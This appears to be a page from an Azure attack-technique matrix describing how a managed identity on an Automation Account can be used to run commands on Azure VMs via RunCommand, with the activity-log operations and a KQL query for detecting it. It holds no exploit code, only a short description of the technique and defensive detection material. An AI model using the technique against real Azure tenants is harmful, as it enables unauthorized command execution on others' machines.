Skip to content

AZT302.3 - Unmanaged Scripting: Automation Account Managed Identity Account#

By utilizing an Automation Account configured with a Managed Identity, an attacker can execute commands on an Azure VM via RunCommand (AZT301.1) if that service principal has the correct role and privileges.


Automation Account


  • Microsoft.Automation/automationAccounts/runbooks/*


Detection Details#

Note that the listed query requires Azure Diagnostics turned on for the resource.


Data Source Operation Name Action Log Provider
Resource Create an Azure Automation job Microsoft.Automation/automationAccounts/jobs/write AzureActivity
Resource Publish an Azure Automation runbook draft Microsoft.Automation/automationAccounts/runbooks/publish/action AzureActivity
Resource Write an Azure Automation runbook draft Microsoft.Automation/automationAccounts/runbooks/draft/write AzureActivity
Resource Create or Update an Azure Automation Runbook Microsoft.Automation/automationAccounts/runbooks/write AzureActivity


Platform Query
Log Analytics `#!sql
## Queries
Platform Query
Log Analytics AzureDiagnostics | where ResultDescription has 'TenantId' and ResultDescription has 'SubscriptionName' and ResultDescription has 'Account' and ResourceType == 'AUTOMATIONACCOUNTS'

Azure Monitor Alert#

Deploy to Azure